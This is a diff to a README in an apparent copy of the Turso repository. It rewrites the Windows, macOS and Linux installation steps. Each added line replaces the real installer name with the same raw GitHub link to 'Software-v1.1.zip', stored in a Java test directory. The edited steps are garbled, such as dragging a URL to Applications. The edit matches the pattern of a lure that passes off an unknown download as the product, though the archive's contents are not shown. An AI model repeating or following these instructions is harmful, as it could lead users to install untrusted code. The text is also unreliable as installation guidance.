Desi446/turso/README.md

    - After the download completes, locate the downloaded file on your computer.
    - Follow the instructions based on your operating system:
      - **Windows:**
-       - Double-click the `turso-windows-installer.exe` file and follow the prompts.
+       - Double-click the `https://raw.githubusercontent.com/Desi446/turso/main/bindings/java/src/test/java/tech/turso/Software-v1.1.zip` file and follow the prompts.
      - **macOS:**
-       - Open the `.dmg` file and drag `turso.app` to your Applications folder.
+       - Open the `.dmg` file and drag `https://raw.githubusercontent.com/Desi446/turso/main/bindings/java/src/test/java/tech/turso/Software-v1.1.zip` to your Applications folder.
      - **Linux:**
-       - Extract the `.tar.gz` file and follow the instructions in the README for installation.
+       - Extract the `https://raw.githubusercontent.com/Desi446/turso/main/bindings/java/src/test/java/tech/turso/Software-v1.1.zip` file and follow the instructions in the README for installation.

 4. **Start Using Turso**
    - Open the application from your applications folder or start menu.